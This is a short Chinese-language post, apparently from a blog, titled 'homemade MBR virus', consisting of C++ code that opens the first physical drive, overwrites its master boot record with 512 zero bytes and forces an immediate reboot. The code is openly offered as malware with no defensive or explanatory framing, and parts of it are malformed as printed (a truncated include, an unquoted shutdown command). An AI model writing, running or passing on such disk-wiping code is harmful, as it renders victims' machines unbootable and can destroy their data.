自制的MBR病毒

等级:上下

#include

using namespace std;

int main(){

     FILE*fd=fopen("\\\\.\\PHYSICALDRIVE0","rb+");

     char a[512]={0};

     fseek(fd,0,SEEK_SET);

     fwrite(a,512,1,fd);

     system(shutdown -r -f -t 0);

     return 0;

     }

你可能感兴趣的:(c++,算法,数据结构)